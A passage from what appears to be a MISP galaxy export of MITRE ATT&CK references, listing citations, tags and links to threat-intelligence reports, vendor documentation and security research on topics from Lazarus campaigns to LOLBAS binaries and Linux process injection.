The tag is: misp-galaxy:references="Wits End and Shady PowerShell Profiles"

Table 14192. Table References

Links

https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html

NCC Group LAPSUS Apr 2022

Brown, D., et al. (2022, April 28). LAPSUS$: Recent techniques, tactics and procedures. Retrieved December 22, 2022.

The tag is: misp-galaxy:references="NCC Group LAPSUS Apr 2022"

Table 14193. Table References

Links

https://research.nccgroup.com/2022/04/28/lapsus-recent-techniques-tactics-and-procedures/

BBC LAPSUS Apr 2022

BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="BBC LAPSUS Apr 2022"

Table 14194. Table References

Links

https://www.bbc.com/news/technology-60953527

Enigma Excel DCOM Sept 2017

Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma Excel DCOM Sept 2017"

Table 14195. Table References

Links

https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

Enigma Outlook DCOM Lateral Movement Nov 2017

Nelson, M. (2017, November 16). Lateral Movement using Outlook’s CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma Outlook DCOM Lateral Movement Nov 2017"

Table 14196. Table References

Links

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

Enigma MMC20 COM Jan 2017

Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma MMC20 COM Jan 2017"

Table 14197. Table References

Links

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

Enigma DCOM Lateral Movement Jan 2017

Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Enigma DCOM Lateral Movement Jan 2017"

Table 14198. Table References

Links

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

Jacobsen 2014

Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell[slides]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Jacobsen 2014"

Table 14199. Table References

Links

https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2

Launchctl Man

SS64. (n.d.). launchctl. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Launchctl Man"

Table 14200. Table References

Links

https://ss64.com/osx/launchctl.html

LaunchDaemon Hijacking

Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="LaunchDaemon Hijacking"

Table 14201. Table References

Links

https://bradleyjkemp.dev/post/launchdaemon-hijacking/

launchd Keywords for plists

Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.

The tag is: misp-galaxy:references="launchd Keywords for plists"

Table 14202. Table References

Links

https://www.real-world-systems.com/docs/launchdPlist.1.html

Launch Services Apple Developer

Apple. (n.d.). Launch Services. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Launch Services Apple Developer"

Table 14203. Table References

Links

https://developer.apple.com/documentation/coreservices/launch_services

Launch Service Keys Developer Apple

Apple. (2018, June 4). Launch Services Keys. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="Launch Service Keys Developer Apple"

Table 14204. Table References

Links

https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1

Launch-VsDevShell.ps1 - LOLBAS Project

LOLBAS. (2022, June 13). Launch-VsDevShell.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Launch-VsDevShell.ps1 - LOLBAS Project"

Table 14205. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/

MalwareBytes Lazarus-Andariel Conceals Code April 2021

Jazi, H. (2021, April 19). Lazarus APT conceals malicious code within BMP image to drop its RAT . Retrieved September 29, 2021.

The tag is: misp-galaxy:references="MalwareBytes Lazarus-Andariel Conceals Code April 2021"

Table 14206. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/

Lazarus RATANKBA

Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="Lazarus RATANKBA"

Table 14207. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/

ATT Lazarus TTP Evolution

Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="ATT Lazarus TTP Evolution"

Table 14208. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution

TrendMicro Lazarus Nov 2018

Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.

The tag is: misp-galaxy:references="TrendMicro Lazarus Nov 2018"

Table 14209. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/

F-Secure Lazarus Cryptocurrency Aug 2020

F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.

The tag is: misp-galaxy:references="F-Secure Lazarus Cryptocurrency Aug 2020"

Table 14210. Table References

Links

https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf

ESET Lazarus KillDisk April 2018

Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.

The tag is: misp-galaxy:references="ESET Lazarus KillDisk April 2018"

Table 14211. Table References

Links

https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/

Lazarus KillDisk

Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.

The tag is: misp-galaxy:references="Lazarus KillDisk"

Table 14212. Table References

Links

https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/

McAfee Lazarus Resurfaces Feb 2018

Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="McAfee Lazarus Resurfaces Feb 2018"

Table 14213. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/

Kaspersky ThreatNeedle Feb 2021

Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.

The tag is: misp-galaxy:references="Kaspersky ThreatNeedle Feb 2021"

Table 14214. Table References

Links

https://securelist.com/lazarus-threatneedle/100803/

Kaspersky Lazarus Under The Hood Blog 2017

GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Kaspersky Lazarus Under The Hood Blog 2017"

Table 14215. Table References

Links

https://securelist.com/lazarus-under-the-hood/77908/

Kaspersky Lazarus Under The Hood APR 2017

GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Kaspersky Lazarus Under The Hood APR 2017"

Table 14216. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

Secureworks Emotet Nov 2018

Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Secureworks Emotet Nov 2018"

Table 14217. Table References

Links

https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader

MalwareBytes LazyScripter Feb 2021

Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.

The tag is: misp-galaxy:references="MalwareBytes LazyScripter Feb 2021"

Table 14218. Table References

Links

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

Ldifde.exe - LOLBAS Project

LOLBAS. (2022, August 31). Ldifde.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ldifde.exe - LOLBAS Project"

Table 14219. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ldifde/

Ldifde Microsoft

Microsoft. (2016, August 31). Ldifde Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Ldifde Microsoft"

Table 14220. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)

Symantec Leafminer July 2018

Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.

The tag is: misp-galaxy:references="Symantec Leafminer July 2018"

Table 14221. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

Proofpoint TA505 Mar 2018

Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 Mar 2018"

Table 14222. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware

Medium DnsTunneling

Galobardes, R. (2018, October 30). Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it). Retrieved March 15, 2020.

The tag is: misp-galaxy:references="Medium DnsTunneling"

Table 14223. Table References

Links

https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000

Learn XPC Exploitation

Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Learn XPC Exploitation"

Table 14224. Table References

Links

https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/

ClearSky Lebanese Cedar Jan 2021

ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.

The tag is: misp-galaxy:references="ClearSky Lebanese Cedar Jan 2021"

Table 14225. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Mandiant UNC3313 Feb 2022

Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Mandiant UNC3313 Feb 2022"

Table 14226. Table References

Links

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

LemonDuck

Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.

The tag is: misp-galaxy:references="LemonDuck"

Table 14227. Table References

Links

https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

Twitter Leoloobeek Scheduled Task

Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Twitter Leoloobeek Scheduled Task"

Table 14228. Table References

Links

https://twitter.com/leoloobeek/status/939248813465853953

Let’s Encrypt FAQ

Let’s Encrypt. (2020, April 23). Let’s Encrypt FAQ. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Let’s Encrypt FAQ"

Table 14229. Table References

Links

https://letsencrypt.org/docs/faq/

OSX Malware Detection

Patrick Wardle. (2016, February 29). Let’s Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="OSX Malware Detection"

Table 14230. Table References

Links

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

xorrior emond Jan 2018

Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="xorrior emond Jan 2018"

Table 14231. Table References

Links

https://www.xorrior.com/emond-persistence/

Cyberreason DCOM DDE Lateral Movement Nov 2017

Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Cyberreason DCOM DDE Lateral Movement Nov 2017"

Table 14232. Table References

Links

https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom

Proofpoint Leviathan Oct 2017

Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Proofpoint Leviathan Oct 2017"

Table 14233. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

LIBC

Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="LIBC"

Table 14234. Table References

Links

https://man7.org/linux/man-pages//man7/libc.7.html

libzip

  1. Baron, T. Klausner. (2020). libzip. Retrieved February 20, 2020.

The tag is: misp-galaxy:references="libzip"

Table 14235. Table References

Links

https://libzip.org/

Symantec Darkmoon Sept 2014

Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Symantec Darkmoon Sept 2014"

Table 14236. Table References

Links

https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign

Wikipedia LLMNR

Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Wikipedia LLMNR"

Table 14237. Table References

Links

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

IzyKnows auditd threat detection 2022

IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="IzyKnows auditd threat detection 2022"

Table 14238. Table References

Links

https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505

Fysbis Dr Web Analysis

Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="Fysbis Dr Web Analysis"

Table 14239. Table References

Links

https://vms.drweb.com/virus/?i=4276269

GDSecurity Linux injection

McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved December 20, 2017.

The tag is: misp-galaxy:references="GDSecurity Linux injection"

Table 14240. Table References

Links

https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html

GDS Linux Injection

McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.

The tag is: misp-galaxy:references="GDS Linux Injection"

Table 14241. Table References

Links

https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html

Linux/Cdorked.A We Live Security Analysis

Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.

The tag is: misp-galaxy:references="Linux/Cdorked.A We Live Security Analysis"

Table 14242. Table References

Links

https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/

Avast Linux Trojan Cron Persistence

Threat Intelligence Team. (2015, January 6). Linux DDoS Trojan hiding itself with an embedded rootkit. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Avast Linux Trojan Cron Persistence"

Table 14243. Table References

Links

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

BH Linux Inject

Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="BH Linux Inject"

Table 14244. Table References

Links

https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf

PAM Backdoor

zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="PAM Backdoor"

Table 14245. Table References

Links

https://github.com/zephrax/linux-pam-backdoor

Linux Password and Shadow File Formats

The Linux Documentation Project. (n.d.). Linux Password and Shadow File Formats. Retrieved February 19, 2020.

The tag is: misp-galaxy:references="Linux Password and Shadow File Formats"

Table 14246. Table References

Links

https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html

nixCraft - John the Ripper

Vivek Gite. (2014, September 17). Linux Password Cracking: Explain unshadow and john Commands (John the Ripper Tool). Retrieved February 19, 2020.

The tag is: misp-galaxy:references="nixCraft - John the Ripper"

Table 14247. Table References

Links

https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/

Polop Linux PrivEsc Gitbook

Carlos Polop. (2023, March 5). Linux Privilege Escalation. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="Polop Linux PrivEsc Gitbook"

Table 14248. Table References

Links

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem

setuid man page

Michael Kerrisk. (2017, September 15). Linux Programmer’s Manual. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="setuid man page"

Table 14249. Table References

Links

http://man7.org/linux/man-pages/man2/setuid.2.html

Man LD.SO

Kerrisk, M. (2020, June 13). Linux Programmer’s Manual. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Man LD.SO"

Table 14250. Table References

Links

https://www.man7.org/linux/man-pages/man8/ld.so.8.html

Uninformed Needle

skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Uninformed Needle"

Table 14251. Table References

Links

http://hick.org/code/skape/papers/needle.txt

List Blobs

Microsoft - List Blobs. (n.d.). Retrieved October 4, 2021.

The tag is: misp-galaxy:references="List Blobs"

Table 14252. Table References

Links

https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs

ListObjectsV2

Amazon - ListObjectsV2. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="ListObjectsV2"

Table 14253. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html

Wikipedia File Header Signatures

Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.

The tag is: misp-galaxy:references="Wikipedia File Header Signatures"

Table 14254. Table References

Links

https://en.wikipedia.org/wiki/List_of_file_signatures

Wikipedia OSI

Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Wikipedia OSI"

Table 14255. Table References

Links

http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29

AWS List Roles

Amazon. (n.d.). List Roles. Retrieved August 11, 2020.

The tag is: misp-galaxy:references="AWS List Roles"

Table 14256. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html

Google Cloud Secrets

Google Cloud. (n.d.). List secrets and view secret details. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="Google Cloud Secrets"

Table 14257. Table References

Links

https://cloud.google.com/secret-manager/docs/view-secret-details

Peripheral Discovery Linux

Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Peripheral Discovery Linux"

Table 14258. Table References

Links

https://linuxhint.com/list-usb-devices-linux/

AWS List Users

Amazon. (n.d.). List Users. Retrieved August 11, 2020.

The tag is: misp-galaxy:references="AWS List Users"

Table 14259. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html

Sophos PowerShell command audit

jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.

The tag is: misp-galaxy:references="Sophos PowerShell command audit"

Table 14260. Table References

Links

https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit

Dell TG-1314

Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="Dell TG-1314"

Table 14261. Table References

Links

http://www.secureworks.com/resources/blog/living-off-the-land/

Symantec Living off the Land

Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.

The tag is: misp-galaxy:references="Symantec Living off the Land"

Table 14262. Table References

Links

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf

LOLBAS Main Site

LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.

The tag is: misp-galaxy:references="LOLBAS Main Site"

Table 14263. Table References

Links

https://lolbas-project.github.io/

LOLBAS Project

Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="LOLBAS Project"

Table 14264. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS#criteria

FireEye 2019 Apple Remote Desktop

Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.

The tag is: misp-galaxy:references="FireEye 2019 Apple Remote Desktop"

Table 14265. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html

LKM loading kernel restrictions

Pingios, A.. (2018, February 7). LKM loading kernel restrictions. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="LKM loading kernel restrictions"

Table 14266. Table References

Links

https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/

Rapid7 LLMNR Spoofer

Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Rapid7 LLMNR Spoofer"

Table 14267. Table References

Links

https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response

Wikipedia Loadable Kernel Module

Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Wikipedia Loadable Kernel Module"

Table 14268. Table References

Links

https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux

Microsoft LoadLibrary

Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft LoadLibrary"

Table 14269. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya

Microsoft Local Accounts Feb 2019

Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.

The tag is: misp-galaxy:references="Microsoft Local Accounts Feb 2019"

Table 14270. Table References

Links

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts

Sternsecurity LLMNR-NBTNS

Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="Sternsecurity LLMNR-NBTNS"

Table 14271. Table References

Links

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

Sophos Geolocation 2016

Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Sophos Geolocation 2016"

Table 14272. Table References

Links

https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/

VMWare LockBit 3.0 October 2022

Dana Behling. (2022, October 15). LockBit 3.0 Ransomware Unlocked. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="VMWare LockBit 3.0 October 2022"

Table 14273. Table References

Links

https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html

Sentinel Labs LockBit 3.0 July 2022

Jim Walter, Aleksandar Milenkoski. (2022, July 21). LockBit 3.0 Update | Unpicking the Ransomware’s Latest Anti-Analysis and Evasion Techniques. Retrieved May 19, 2023.

The tag is: misp-galaxy:references="Sentinel Labs LockBit 3.0 July 2022"

Table 14274. Table References

Links

https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/

Cary Esentutl

Cary, M. (2018, December 6). Locked File Access Using ESENTUTL.exe. Retrieved September 5, 2019.

The tag is: misp-galaxy:references="Cary Esentutl"

Table 14275. Table References

Links

https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/

Group IB Ransomware September 2020

Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="Group IB Ransomware September 2020"

Table 14276. Table References

Links

https://groupib.pathfactory.com/ransomware-reports/prolock_wp

AWS Cloud Trail Backup API

Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020.

The tag is: misp-galaxy:references="AWS Cloud Trail Backup API"

Table 14277. Table References

Links

https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html

AWS Logging IAM Calls

AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AWS Logging IAM Calls"

Table 14278. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html

Login Items AE

Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="Login Items AE"

Table 14279. Table References

Links

https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788

LoginWindowScripts Apple Dev

Apple. (n.d.). LoginWindowScripts. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="LoginWindowScripts Apple Dev"

Table 14280. Table References

Links

https://developer.apple.com/documentation/devicemanagement/loginwindowscripts

LogMeIn Homepage

LogMeIn. (n.d.). LogMeIn Homepage. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="LogMeIn Homepage"

Table 14281. Table References

Links

https://www.logmein.com/

ESET LoJax Sept 2018

ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.

The tag is: misp-galaxy:references="ESET LoJax Sept 2018"

Table 14282. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf

Morphisec Lokibot April 2020

Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="Morphisec Lokibot April 2020"

Table 14283. Table References

Links

https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode

t1105_lolbas

LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="t1105_lolbas"

Table 14284. Table References

Links

https://lolbas-project.github.io/#t1105

Qualys LolZarus

Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.

The tag is: misp-galaxy:references="Qualys LolZarus"

Table 14285. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns

Bitdefender Trickbot C2 infra Nov 2020

Liviu Arsene, Radu Tudorica. (2020, November 23). TrickBot is Dead. Long Live TrickBot!. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Bitdefender Trickbot C2 infra Nov 2020"

Table 14286. Table References

Links

https://www.bitdefender.com/blog/labs/trickbot-is-dead-long-live-trickbot/

Proofpoint LookBack Malware Aug 2019

Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Proofpoint LookBack Malware Aug 2019"

Table 14287. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks

Fidelis DarkComet

Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.

The tag is: misp-galaxy:references="Fidelis DarkComet"

Table 14288. Table References

Links

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

BlackHat Process Doppelgänging Dec 2017

Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelgänging. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="BlackHat Process Doppelgänging Dec 2017"

Table 14289. Table References

Links

https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf

ESET LoudMiner June 2019

Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="ESET LoudMiner June 2019"

Table 14290. Table References

Links

https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/

GitHub Mimikatz Issue 92 June 2017

Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="GitHub Mimikatz Issue 92 June 2017"

Table 14291. Table References

Links

https://github.com/gentilkiwi/mimikatz/issues/92

lsmod man

Kerrisk, M. (2022, December 18). lsmod(8) — Linux manual page. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="lsmod man"

Table 14292. Table References

Links

https://man7.org/linux/man-pages/man8/lsmod.8.html

Unit 42 Lucifer June 2020

Hsu, K. et al. (2020, June 24). Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="Unit 42 Lucifer June 2020"

Table 14293. Table References

Links

https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/

Securelist LuckyMouse June 2018

